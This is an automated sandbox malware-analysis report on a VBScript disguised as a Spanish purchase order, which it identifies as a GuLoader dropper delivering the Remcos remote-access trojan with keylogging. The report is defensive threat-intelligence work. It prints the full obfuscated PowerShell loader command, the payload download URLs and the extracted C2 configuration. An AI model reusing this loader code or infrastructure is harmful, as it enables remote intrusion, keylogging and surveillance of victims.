Windows Analysis Report
nOrden_de_Compra___0001245.vbs

Overview

General Information

Sample name:	nOrden_de_Compra___0001245.vbs
Analysis ID:	1545815
MD5:	44f5fc0dbe40738a8d1da8a520c37ade
SHA1:	1ae7e777e876136b30aec574f10215ef672ff451
SHA256:	4c9a883ec5718156811bee47cca44c3115f1dcb04ecc6541192e807ec1952e85
Tags:	vbsuser-Porcupine
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Early bird code injection technique detected

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Remcos

Suricata IDS alerts for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Found suspicious powershell code related to unpacking or dynamic code loading

Installs a global keyboard hook

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Uses dynamic DNS services

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Found malware configuration

Source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["fumecexpsales1international.duckdns.org:50396:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T15VJD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara detected Remcos RAT

Source: Yara match	File source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.1% probability

Source: unknown	HTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49401 version: TLS 1.2

Source:	Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdbui source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49428 -> 185.236.203.101:50396
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49474 -> 185.236.203.101:50396
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49543 -> 185.236.203.101:50396
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49541 -> 185.236.203.101:50396
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49538 -> 185.236.203.101:50396
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49522 -> 185.236.203.101:50396
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49540 -> 185.236.203.101:50396
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49542 -> 185.236.203.101:50396
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49544 -> 185.236.203.101:50396

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: fumecexpsales1international.duckdns.org

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.236.203.101 ports 0,3,50396,5,6,9

Uses dynamic DNS services

Source: unknown

DNS query: name: fumecexpsales1international.duckdns.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49428 -> 185.236.203.101:50396

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.236.203.101 185.236.203.101
Source: Joe Sandbox View	IP Address: 200.6.118.162 200.6.118.162

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49401 -> 200.6.118.162:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /bin/Interplea.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bin/iNJULFUvfUQqzNBELgyUIZY67.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /bin/Interplea.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bin/iNJULFUvfUQqzNBELgyUIZY67.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: torresvmackenna.cl
Source: global traffic	DNS traffic detected: DNS query: fumecexpsales1international.duckdns.org

Source: wscript.exe, 00000000.00000002.2066149580.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063357887.000001FB2D8DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.2063357887.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2066149580.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2046230842.000001FB2F914000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046040317.000001FB2F914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabB
Source: wscript.exe, 00000000.00000002.2066149580.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063357887.000001FB2D8DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
Source: wscript.exe, 00000000.00000003.2046141045.000001FB2D95F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045915330.000001FB2D937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?97dbf7f69e
Source: powershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CC96C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://torresvmackenna.cl
Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CB8C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CB16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178361107.000001A2CC235000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://torresvmackenna.cl
Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAF55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://torresvmackenna.cl/bin/Interplea.snpP
Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://torresvmackenna.cl/bin/Interplea.snpXR#l
Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3318420057.0000000000CE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin
Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin1
Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.binb

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49401
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49401 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown	HTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49401 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\SysWOW64\msiexec.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe

Source: amsi32_7108.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 576, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848E8A726	4_2_00007FF848E8A726
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848E8B8E2	4_2_00007FF848E8B8E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04ADE918	6_2_04ADE918
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04ADF1E8	6_2_04ADF1E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04ADE5D0	6_2_04ADE5D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_078DCDF0	6_2_078DCDF0

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4378
Source: unknown	Process created: Commandline size = 4378
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4378	Jump to behavior

Source: amsi32_7108.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 576, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3200:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-T15VJD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=576
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7108

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
